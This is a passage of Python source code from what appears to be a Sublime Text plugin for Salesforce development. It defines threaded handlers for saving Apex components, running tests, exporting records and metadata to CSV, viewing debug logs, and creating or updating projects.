def handle_update_aura_meta(body, element, timeout=120, type="AuraDefinitionBundle"):
"""
:param body: body data returned from SOAP API
:param element: Aura type in `COMPONENT`, `CONTROLLER`, `HELPER`, `SVG`...
:param timeout: timeout in second
:param type: metadata type of the bundle, defaults to "AuraDefinitionBundle"
:return:
"""
def handle_thread(thread, full_name, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, full_name, timeout), timeout)
return
result = api.result
if not result or not result["success"]:
return
if result["totalSize"] == 0:
Printer.get("log").write("There is no component data")
return
elif result["totalSize"] == 1:
record = result["records"][0]
cmp_meta = {
"name": full_name[:full_name.find('.')],
"extension": full_name[full_name.find('.'):],
"id": record["Id"],
"lastModifiedDate": record["LastModifiedDate"],
"type": "AuraDefinitionBundle",
"DefType": record["DefType"]
}
components_dict[type][full_name.lower()] = cmp_meta
s.set(username, components_dict)
sublime.save_settings(context.COMPONENT_METADATA_SETTINGS)
# Refresh metadata settings
sublime.set_timeout(lambda: util.load_metadata_cache(True, settings["username"]), 5)
settings = context.get_settings()
username = settings["username"]
s = sublime.load_settings(context.COMPONENT_METADATA_SETTINGS)
if not s.has(username):
return
component_successes = body["details"]["componentSuccesses"]
if isinstance(component_successes, dict):
component_successes = [component_successes]
for item in component_successes:
if item["componentType"] == "AuraDefinitionBundle":
base_name = item["fullName"]
full_name = base_name + context.EXT_DICT.get(element.lower())
components_dict = s.get(username, {})
# Prevent exception if no component in org
if type not in components_dict:
components_dict = {type: {}}
# Build components dict
api = ToolingApi(settings)
query_str = "SELECT Id, DefType, LastModifiedDate, LastModifiedById " +\
"FROM AuraDefinition WHERE AuraDefinitionBundleId = '%s' and DefType = '%s'" % (
item['id'], element.upper())
thread = threading.Thread(target=api.query, args=(query_str,))
thread.start()
ThreadProgress(api, thread, "Update Component Metadata", "Update Component Metadata Finished")
handle_thread(thread, full_name, timeout)
break
def handle_track_all_debug_logs_thread(users, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
# Divide users into pieces of dict
pieces = []
maximum_concurrent_connections = settings["maximum_concurrent_connections"]
split = math.ceil(len(users) / maximum_concurrent_connections)
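# e.g. (hypothetical numbers) 100 users with maximum_concurrent_connections = 10
# gives split = 10, so util.dict_chunks should yield ten pieces of about ten
# users each, one worker thread per piece below.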
for item in util.dict_chunks(users, split):
pieces.append(item)
threads = []
for users in pieces:
api = ToolingApi(settings)
thread = threading.Thread(target=api.create_trace_flags, args=(users, ))
thread.start()
threads.append(thread)
ThreadsProgress(threads, "Creating Trace Flags", "Creating Trace Flags Finished")
def handle_cancel_deployment_thread(async_process_id, timeout=120):
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api._invoke_method, args=(
"cancelDeploy", {
"async_process_id": async_process_id,
}
))
thread.start()
ThreadProgress(api, thread, "Canceling Deploy", "Canceling Deploy Succeed")
def handle_close_jobs_thread(job_ids, timeout=120):
settings = context.get_settings()
bulkjob = BulkJob(settings, None, None)
for job_id in job_ids:
thread = threading.Thread(target=bulkjob.close_job, args=(job_id,))
thread.start()
def handle_bulk_operation_thread(sobject, inputfile, operation, timeout=120):
settings = context.get_settings()
bulkapi = BulkApi(settings, sobject, inputfile)
if operation == "insert":
target = bulkapi.insert
elif operation == "update":
target = bulkapi.update
elif operation == "upsert":
target = bulkapi.upsert
elif operation == "delete":
target = bulkapi.delete
thread = threading.Thread(target=target, args=())
thread.start()
progress_message = operation + " " + sobject
ThreadProgress(bulkapi, thread, progress_message, progress_message + " Succeed")
def handle_backup_sobject_thread(sobject, soql=None, timeout=120):
settings = context.get_settings()
bulkapi = BulkApi(settings, sobject, soql)
thread = threading.Thread(target=bulkapi.query, args=())
thread.start()
wait_message = "Export Records of " + sobject
ThreadProgress(bulkapi, thread, wait_message, wait_message + " Succeed")
def handle_backup_all_sobjects_thread(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
result = api.result
if not result or not result["success"]: return
threads = []
for sobject_describe in api.result["sobjects"]:
if "name" not in sobject_describe: continue
bulkapi = BulkApi(settings, sobject_describe["name"])
thread = threading.Thread(target=bulkapi.query, args=())
thread.start()
threads.append(thread)
wait_message = "Export All Sobjects Records"
ThreadsProgress(threads, wait_message, wait_message + " Succeed")
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Describe Global", "Describe Global Succeed")
handle_thread(thread, timeout)
def handle_export_workflows(settings, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
sObjects = []
for sd in api.result["sobjects"]:
if "name" not in sd: continue
sObjects.append(sd["name"])
util.parse_workflow_metadata(settings, sObjects)
sublime.active_window().run_command("refresh_folder_list")
outputdir = settings["workspace"] + "/workflow/"
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Export All Workflows", "Outputdir: " + outputdir)
handle_thread(thread, 10)
def handle_export_validation_rules(settings, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
sObjects = []
for sd in api.result["sobjects"]:
if "name" not in sd: continue
sObjects.append(sd["name"])
util.parse_validation_rule(settings, sObjects)
sublime.active_window().run_command("refresh_folder_list")
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Export All Validation Rules", "Validation Rules Export Succeed")
handle_thread(thread, 10)
def handle_export_customfield(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result or not result["success"]: return
# Write list to csv
outputdir = os.path.join(settings["workspace"], ".export")
if not os.path.exists(outputdir): os.makedirs(outputdir)
records = sorted(result["records"], key=lambda k : k['TableEnumOrId'])
outputfile = os.path.join(outputdir, "CustomField.csv")
util.list2csv(outputfile, records)
# Open the csv file
view = sublime.active_window().open_file(outputfile)
settings = context.get_settings()
api = ToolingApi(settings)
query = "SELECT Id,TableEnumOrId,DeveloperName,NamespacePrefix FROM CustomField"
thread = threading.Thread(target=api.query, args=(query, True,))
thread.start()
ThreadProgress(api, thread, 'Exporting CustomFields', "Exporting CustomFields Succeed")
handle_thread(thread, 10)
def handle_export_role_hierarchy(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result or not result["success"]: return
records = result["records"]
outputfile = util.export_role_hierarchy(records)
sublime.active_window().run_command("refresh_folder_list")
# Open file
view = sublime.active_window().open_file(outputfile)
settings = context.get_settings()
api = ToolingApi(settings)
soql = "SELECT Id, ParentRoleId, Name, " +\
"(SELECT Id, FirstName, LastName, Username FROM Users " +\
" WHERE IsActive = true AND Profile.UserLicense.Name = 'Salesforce') " +\
"FROM UserRole WHERE PortalType = 'None'"
thread = threading.Thread(target=api.query_all, args=(soql,))
thread.start()
ThreadProgress(api, thread, 'Exporting Role Hierarchy', "Role Hierarchy Exporting Succeed")
handle_thread(thread, 10)
def handle_export_data_template_thread(sobject, recordtype_name, recordtype_id, vertical, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result or not result["success"]: return
# If outputdir does not exist, create it
if not os.path.exists(outputdir): os.makedirs(outputdir)
# Write parsed result to csv
if vertical:
util.parse_data_template_vertical(output_file_dir, result)
else:
util.parse_data_template_horizontal(output_file_dir, result)
sublime.active_window().run_command("refresh_folder_list")
Printer.get("log").write("Data Template for %s: %s" % (sobject, output_file_dir))
settings = context.get_settings()
outputdir = settings["workspace"] + "/.export/layoutWorkbooks"
output_file_dir = "%s/%s-%s.csv" % (
outputdir, sobject, recordtype_name
)
api = ToolingApi(settings)
url = "/sobjects/%s/describe/layouts/%s" % (sobject, recordtype_id)
thread = threading.Thread(target=api.get, args=(url, ))
thread.start()
wait_message = "Export Data Template of %s=>%s" % (sobject, recordtype_name)
ThreadProgress(api, thread, wait_message, "Outputdir: " + output_file_dir)
handle_thread(thread, 120)
def handle_export_query_to_csv(tooling, soql, csv_name, data=None, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
result = api.result
if "success" in result and not result["success"]:
return
outputdir = os.path.join(settings["workspace"], ".export", "Query2CSV")
if not os.path.exists(outputdir): os.makedirs(outputdir)
time_stamp = time.strftime("%Y-%m-%d-%H-%M", time.localtime())
outputfile = os.path.join(outputdir, "%s.csv" % csv_name)
with open(outputfile, "wb") as fp:
fp.write(util.query_to_csv(result, soql))
view = sublime.active_window().open_file(outputfile)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query_all, args=(soql, tooling, ))
thread.start()
progress_message = "Export Query To %s.csv" % csv_name
ThreadProgress(api, thread, progress_message, progress_message + " Succeed")
handle_new_view_thread(thread, timeout)
def handle_execute_rest_test(operation, url, data=None, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
result = api.result
# If succeed
if "list" in result:
result = result["list"]
if "str" in result:
result = result["str"]
# If response result is just like '"{\\"name\\":\\"test\\"}"'
# we will remove the \\ and convert it to json automatically
if settings.get("remove_slash_for_rest_response", False):
try:
if "\\" in result:
result = result.replace("\\", "")
result = result[1:-1]
result = json.loads(result)
except:
pass
# Remove the useless success attribute
if isinstance(result, dict) and "success" in result:
del result["success"]
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.set_syntax_file("Packages/JavaScript/JSON.tmLanguage")
time_stamp = time.strftime("%H:%M:%S", time.localtime(time.time()))
view.run_command("new_view", {
"name": "Rest %s-%s" % (operation, time_stamp),
"input": json.dumps(result, ensure_ascii=False, indent=4)
})
settings = context.get_settings()
api = ToolingApi(settings)
http_methods_target = {
"Get": api.get,
"Delete": api.delete,
"Head": api.head,
"Put": api.put,
"Post": api.post,
"Query": api.query,
"Tooling Query": api.query,
"Query All": api.query_all,
"Retrieve Body": api.retrieve_body,
"Patch": api.patch,
"Search": api.search,
"Quick Search": api.quick_search
}
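# Note: for the Query / Tooling Query / Query All operations, the `url` argument
# actually carries the SOQL string expected by api.query / api.query_all.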
target = http_methods_target[operation]
if operation in ['Put', 'Post', 'Patch']:
thread = threading.Thread(target=target, args=(url, data,))
elif operation == "Tooling Query":
thread = threading.Thread(target=target, args=(url, True))
else:
thread = threading.Thread(target=target, args=(url,))
thread.start()
progress_message = "Execute Rest %s Test" % operation
ThreadProgress(api, thread, progress_message, progress_message + " Succeed", show_error=False)
handle_new_view_thread(thread, timeout)
def handle_execute_query(soql, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result["success"]: return
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Execute Query Result",
"input": json.dumps(result, indent=4)
})
# Keep the query in the local operation history
util.add_operation_history('execute_query', soql)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query, args=(soql,))
thread.start()
ThreadProgress(api, thread, "Execute Query", "Execute Query Succeed")
handle_new_view_thread(thread, timeout)
def handle_execute_anonymous(apex_string, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result["success"]: return
if result["compiled"] == "false":
Printer.get('error').write(util.parse_execute_anonymous_xml(result))
else:
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Execute Anonymous Result",
"input": util.parse_execute_anonymous_xml(result)
})
view.settings().set("is_debug_log", True)
# Keep the executed Apex script in the local operation history
util.add_operation_history('execute_anonymous', apex_string)
settings = context.get_settings()
api = ApexApi(settings)
thread = threading.Thread(target=api.execute_anonymous, args=(apex_string, ))
thread.start()
ThreadProgress(api, thread, "Execute Anonymous", "Execute Anonymous Succeed")
handle_new_view_thread(thread, timeout)
def handle_fetch_debug_logs(user_full_name, user_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result or "records" not in result:
return
records = result["records"]
debug_logs_table = util.format_debug_logs(settings, records)
Printer.get("log").write_start().write(debug_logs_table)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query_logs, args=(settings["last_n_logs"], user_id, ))
thread.start()
ThreadProgress(api, thread, "List Debug Logs for " + user_full_name,
"List Debug Logs for " + user_full_name + " Succeed")
handle_thread(thread, timeout)
def handle_create_debug_log(user_name, user_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]: return
print(result)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.create_trace_flag, args=(user_id, ))
thread.start()
ThreadProgress(api, thread, "Create Debug Log for " + user_name,
"Create Debug Log for " + user_name + " Succeed")
handle_thread(thread, timeout)
def handle_view_debug_log_detail(log_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
if not api.result["success"]: return
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Debug Log Detail",
"input": api.result["str"]
})
view.settings().set("is_debug_log", True)
settings = context.get_settings()
api = ToolingApi(settings)
url = "/sobjects/ApexLog/" + log_id + "/Body"
thread = threading.Thread(target=api.retrieve_body, args=(url, ))
thread.start()
ThreadProgress(api, thread, "Get Log Detail of " + log_id,
"Get Log Detail of " + log_id + " Succeed")
handle_thread(thread, timeout)
def handle_run_test(class_name, class_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
# If error
if "success" in result and not result["success"]: return
if not result:
return Printer.get("error").write("%s is not a test class" % class_name)
# No error, just display log in a new view
test_result = util.parse_test_result(result)
view = sublime.active_window().new_file()
view.settings().set("word_wrap", "false")
view.run_command("new_dynamic_view", {
"view_id": view.id(),
"view_name": "Test Result",
"input": test_result
})
# Keep the test result in the local operation history
util.add_operation_history('Test/' + class_name, test_result)
# After the test run succeeds, query ApexCodeCoverageAggregate
query = "SELECT ApexClassOrTrigger.Name, NumLinesCovered, NumLinesUncovered, Coverage " +\
"FROM ApexCodeCoverageAggregate"
thread = threading.Thread(target=api.query, args=(query, True, ))
thread.start()
wait_message = "Get Code Coverage of " + class_name
ThreadProgress(api, thread, wait_message, wait_message + " Succeed")
handle_code_coverage_thread(thread, view, timeout)
def handle_code_coverage_thread(thread, view, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_code_coverage_thread(thread, view, timeout), timeout)
return
# If error, just skip
result = api.result
if "success" in result and not result["success"]: return
code_coverage = util.parse_code_coverage(result)
view.run_command("new_dynamic_view", {
"view_id": view.id(),
"view_name": "Test Result",
"input": code_coverage,
"point": view.size()
})
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.run_test, args=(class_id, ))
thread.start()
ThreadProgress(api, thread, "Run Test Class " + class_name, "Run Test for " + class_name + " Succeed")
handle_thread(thread, timeout)
def handle_run_sync_test(class_names, test_names, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if "success" in result and not result["success"]:
return
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Sync Test Coverage Report",
"input": util.parse_sync_test_coverage(result)
})
if settings["debug_mode"]:
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Sync Test Raw Response",
"input": json.dumps(result, indent=4)
})
# Keep the coverage to local cache
codeCoverages = result["codeCoverage"]
cache_dir = os.path.join(settings["workspace"], ".config")
cache_file = os.path.join(cache_dir, "coverage.json")
coverages = {}
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
elif os.path.isfile(cache_file):
coverages = json.loads(open(cache_file).read())
# Upsert exist code coverage info
for codeCoverage in codeCoverages:
lowerName = codeCoverage["name"].lower()
coverages[lowerName] = codeCoverage
with open(cache_file, "w") as fp:
fp.write(json.dumps(coverages, indent=4))
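# coverage.json ends up keyed by lowercase class/trigger name; each value is the
# raw codeCoverage record returned by runTestsSynchronous.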
# Get the latest debug log
sublime.active_window().run_command('fetch_debug_log', {
"fetch_self": True
})
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.run_tests_synchronous, args=(class_names[0], test_names))
thread.start()
wait_message = "Running Sync Test Classes%s" % (
" for %s" % class_names[0] if len(class_names) == 1 else ""
)
ThreadProgress(api, thread, wait_message, wait_message + " Succeed")
handle_thread(thread, timeout)
def handle_generate_sobject_soql(sobject, filter, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
# Error messages are processed in ThreadProgress
if not result["success"]: return
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": sobject + " SOQL",
"input": result["soql"]
})
# Keep sobject describe history
util.add_operation_history('SOQL/' + sobject, result["soql"])
settings = context.get_settings()
api = ToolingApi(settings)
if filter != "all":
args = (sobject, filter, )
else:
args = (sobject, )
thread = threading.Thread(target=api.combine_soql, args=args)
thread.start()
wait_message = 'Generate SOQL for ' + sobject
ThreadProgress(api, thread, wait_message, wait_message + ' Succeed')
handle_new_view_thread(thread, timeout)
def handle_describe_sobject(sobject, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
# Error messages are processed in ThreadProgress
if not result["success"]: return
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.settings().set("word_wrap", False)
describe_result = util.parse_sobject_field_result(result)
view.run_command("new_view", {
"name": sobject + " Describe Result",
"input": describe_result
})
view.set_syntax_file("Packages/Textile/Textile.tmLanguage")
# Keep sobject describe history
util.add_operation_history('describe/' + sobject, describe_result)
settings = context.get_settings()
api = ToolingApi(settings)
sobject_url = "/sobjects/" + sobject + "/describe"
thread = threading.Thread(target=api.get, args=(sobject_url, ))
thread.start()
ThreadProgress(api, thread, 'Describe ' + sobject, 'Describe ' + sobject + ' Succeed')
handle_new_view_thread(thread, timeout)
def handle_export_specified_workbooks(sobjects, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
threads = []
mcc = settings["maximum_concurrent_connections"]
chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
for cs in chunked_sobjects:
thread = threading.Thread(target=api.generate_workbook, args=(cs, ))
threads.append(thread)
thread.start()
ThreadsProgress(threads, "Generating Sobjects Workbook",
"Sobjects Workbook are Generated")
def handle_export_all_workbooks(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# Exception Process
if not api.result["success"]: return
# If succeed
sobjects = []
for sd in api.result["sobjects"]:
if "name" not in sd: continue
sobjects.append(sd["name"])
mcc = settings["maximum_concurrent_connections"]
chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
for sobjects in chunked_sobjects:
thread = threading.Thread(target=api.generate_workbook, args=(sobjects, ))
thread.start()
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Describe Global", "Describe Global Succeed")
handle_thread(thread, timeout)
def handle_new_project(is_update=False, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If the request failed (for example, the user password is expired), just stop
result = api.result
if not result or not result["success"]: return
# Extract the apex code to workspace
extract_to = settings["workspace"]
# Just remove the packages folder and src folder
if os.path.exists(extract_to):
# Remove packages directory
if os.path.exists(os.path.join(extract_to, "packages")):
try:
shutil.rmtree(os.path.join(extract_to, "packages"))
except Exception as e:
pass
# Makedir for subscribed meta types
for metadata_folder in settings["subscribed_metadata_folders"]:
outputdir = os.path.join(extract_to, "src", metadata_folder);
if not os.path.exists(outputdir): os.makedirs(outputdir)
# Extract the zipFile to extract_to
thread = threading.Thread(target=util.extract_encoded_zipfile,
args=(result["zipFile"], extract_to, ))
thread.start()
# Apex Code Cache
if "fileProperties" in result and isinstance(result["fileProperties"], list):
util.reload_file_attributes(result["fileProperties"], settings)
else:
if settings["debug_mode"]:
print('[Debug] fileProperties:\n' + json.dumps(result, indent=4))
# Hide panel
sublime.set_timeout_async(Printer.get("log").hide_panel, 500)
# Reload sObject Cache and SymbolTables
if not is_update:
handle_reload_sobjects_completions()
if settings["reload_symbol_tables_when_create_project"]:
handle_reload_symbol_tables()
# Write the settings to local cache
# Not keep the confidential info to .settings
# Since 2015.11.26, stop to keep settings.json
# del settings["projects"]
# del settings["password"]
# del settings["default_project"]
# util.add_config_history('settings', settings, settings)
settings = context.get_settings()
api = MetadataApi(settings)
types = {}
for xml_name in settings["subscribed_metadata_objects"]:
types[xml_name] = ["*"]
thread = threading.Thread(target=api.retrieve, args=({
"types": types,
"package_names": settings["allowed_packages"]
}, ))
thread.start()
wating_message = ("Creating New " if not is_update else "Updating ") + " Project"
ThreadProgress(api, thread, wating_message, wating_message + " Finished")
handle_thread(thread, timeout)
def handle_describe_metadata(callback_options, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# Exception is processed in ThreadProgress
if not api.result or not api.result["success"]: return
result = api.result
del result["success"]
settings = context.get_settings()
cache_dir = os.path.join(settings["workspace"], ".config")
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
cache_file = os.path.join(cache_dir, "metadata.json")
with open(cache_file, "w") as fp:
fp.write(json.dumps(result, indent=4))
if "callback_command" in callback_options:
settings = context.get_settings()
callback_command = callback_options["callback_command"]
args = callback_options["args"] if "args" in callback_options else {}
# If the project already has subscribed_metadata_objects, just stop
if "subscribed_metadata_objects" in settings["default_project"] and \
settings["default_project"]["subscribed_metadata_objects"]:
return sublime.active_window().run_command(callback_command, args)
# If project doesn't have subscribed_metadata_objects, we need
# to choose which metadata_objects to subscribe, which will be saved
# into default project
sublime.active_window().run_command("toggle_metadata_objects", {
"callback_options": callback_options
})
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api._invoke_method, args=("describeMetadata", ))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, "Describe Metadata of v%s.0" % settings["api_version"],
"Describe Metadata Finished")
def handle_rename_metadata(file_name, meta_type, old_name, new_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# If not succeed, just stop
if not api.result or not api.result["success"]: return
result = api.result
if "errors" in result:
return Printer.get("error").write(result["errors"]["message"])
os.rename(file_name, file_name.replace(old_name, new_name))
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
options = {"type": meta_type, "old_name": old_name, "new_name": new_name}
thread = threading.Thread(target=api._invoke_method, args=("renameMetadata", options, ))
thread.start()
handle_thread(thread, timeout)
message = "Renaming %s from %s to %s" % (
meta_type, old_name, new_name
)
ThreadProgress(api, thread, message, "Renaming Finished")
def handle_reload_project_cache(types, callback_command, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
if not api.result or not api.result["success"]: return
types = api.result["types"]
cache_dir = os.path.join(settings["workspace"], ".config")
cache_file = os.path.join(cache_dir, "package.json")
cache = types
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
elif os.path.isfile(cache_file):
cache = json.loads(open(cache_file).read())
for _type in types:
cache[_type] = types[_type]
with open(cache_file, "w") as fp:
fp.write(json.dumps(cache, indent=4))
if callback_command:
sublime.active_window().run_command(callback_command)
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.prepare_members, args=(types, True, ))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, "Reloading Project Cache", "Reload Project Cache Succeed")
def handle_retrieve_package(types, extract_to, source_org=None, ignore_package_xml=False, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# If source_org is not None, we need to switch project back
if settings["switch_back_after_migration"] and source_org:
util.switch_project(source_org)
# Extract the zipFile to extract_to
if api.result and api.result["success"]:
thread = threading.Thread(target=util.extract_encoded_zipfile,
args=(api.result["zipFile"], extract_to, ignore_package_xml, ))
thread.start()
# Apex Code Cache
if isinstance(api.result.get("fileProperties", None), list):
util.reload_file_attributes(
api.result["fileProperties"],
settings, append=True
)
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.retrieve, args=({"types": types}, ))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, "Retrieve File From Server",
"Retrieve File From Server Succeed")
def handle_save_to_server(file_name, is_check_only=False, timeout=120):
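# Flow: guard against concurrent saves with a globals() flag keyed by
# username + file name, send the body through the Tooling API (or the Aura save
# path), optionally keep a local change-history copy, and on compile errors
# jump to and highlight the failing line in the editor.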
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# Set Thread alive flag to False
globals()[username + file_base_name] = False
# Process request result
result = api.result
# If cancel, just diff with server
if "Operation" in result and result["Operation"] == "cancel":
handle_diff_with_server(component_attribute, file_name)
return
if "success" in result and result["success"]:
# 1. Write succeed body to local change history
if settings["keep_local_change_history"] and not is_check_only:
# Append message to output panel
Printer.get('log').write("Start to keep local change history")
# Get Workspace, if not exist, make it
workspace = settings["workspace"]+"/.history/"+component_attribute["type"]
if not os.path.exists(workspace):
os.makedirs(workspace)
# Backup current file
time_stamp = time.strftime("%Y-%m-%d-%H-%M", time.localtime())
outputdir = workspace+"/"+component_name+"-"+time_stamp+"-history"+extension
with open(outputdir, "wb") as fp:
fp.write(body.encode("utf-8"))
# Output succeed message in the console
save_or_compile = "Compiled" if is_check_only else "Saved"
Printer.get('log').write("%s %s successfully" % (save_or_compile, file_base_name))
# Add total seconds message
dt = datetime.datetime.now() - start_time
total_seconds = dt.seconds + dt.microseconds / 1e6
Printer.get('log').write("\nTotal time: %.2f seconds" % total_seconds, False)
# Remove highlight
view = util.get_view_by_file_name(file_name)
if view:
component_id = component_attribute["id"]
view.run_command("remove_check_point", {"mark":component_id+"build_error"})
# If succeed, just hide it in several seconds later
delay_seconds = settings["delay_seconds_for_hidden_output_panel_when_succeed"]
sublime.set_timeout_async(Printer.get("log").hide_panel, delay_seconds * 1000)
# If track_log_after_saved is true, track self debug log asynchronously
if settings["track_log_after_saved"]:
thread = threading.Thread(target=api.create_trace_flag)
thread.start()
# After all are finished, keep the LastModifiedDate
handle_set_component_attribute(component_attribute)
# If not succeed, just go to the error line
# Because the error line in a page is always reported as line 1, this only works for classes and triggers
elif "success" in result and not result["success"]:
# Maybe network issue
if "problem" not in result: return
message = "Compile Error for %s: %s at line %s column %s" % (
file_base_name,
result["problem"],
result["lineNumber"],
result["columnNumber"]
)
Printer.get('log').write(message)
# Get the active view
view = util.get_view_by_file_name(file_name)
# Check that the current view is the file being saved
if not view or not view.file_name(): return
if not file_base_name in view.file_name(): return
if not extension in [".trigger", ".cls", ".page"]: return
if "line" in result:
line = result["line"]
elif "lineNumber" in result:
line = result["lineNumber"]
else:
return
if isinstance(line, list): line = line[0]
if extension == ".page" and line < 2: return
view.run_command("goto_line", {"line": line})
view.run_command("expand_selection", {"to":"line"})
if hasattr(view, 'show_popup'):
error = """
<div>
<h3>Compile Error for %s</h3>
<p style="color: red">
<b>%s</b> at line <b>%s</b> column <b>%s</b>
</p>
</div>
""" % (
file_base_name,
result["problem"],
result["lineNumber"],
result["columnNumber"]
)
view.show_popup(error)
# Add highlight for error line and remove the highlight after several seconds
component_id = component_attribute["id"]
view.run_command("set_check_point", {"mark":component_id+"build_error"})
component_attribute, component_name = util.get_component_attribute(file_name)
body = open(file_name, encoding="utf-8").read()
# Component Full Name
extension = component_attribute["extension"]
file_base_name = component_name + extension
# Log start_time
start_time = datetime.datetime.now()
# If a save of this file is already in progress, just skip
settings = context.get_settings()
username = settings["username"]
if username + file_base_name in globals():
is_thread_alive = globals()[username + file_base_name]
if is_thread_alive:
print('%s save is already in progress' % file_base_name)
return
# Open panel
compile_or_save = "compile" if is_check_only else "save"
Printer.get('log').write_start().write("Start to %s %s" % (compile_or_save, file_base_name))
api = ToolingApi(settings)
if component_attribute["type"] in ["AuraDefinitionBundle", "AuraDefinition"]:
target = api.save_aura_to_server
else:
target = api.save_to_server
thread = threading.Thread(target=target,
args=(component_attribute, body, is_check_only, ))
thread.start()
# If saving thread is started, set the flag to True
globals()[username + file_base_name] = True
# Display thread progress
wait_message = ("Compiling " if is_check_only else "Saving ") + component_name
ThreadProgress(api, thread, wait_message, wait_message + " Succeed", show_error=False)
handle_thread(thread, timeout)
def handle_create_component(data, component_name, component_type, markup_or_body, file_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# If create Succeed
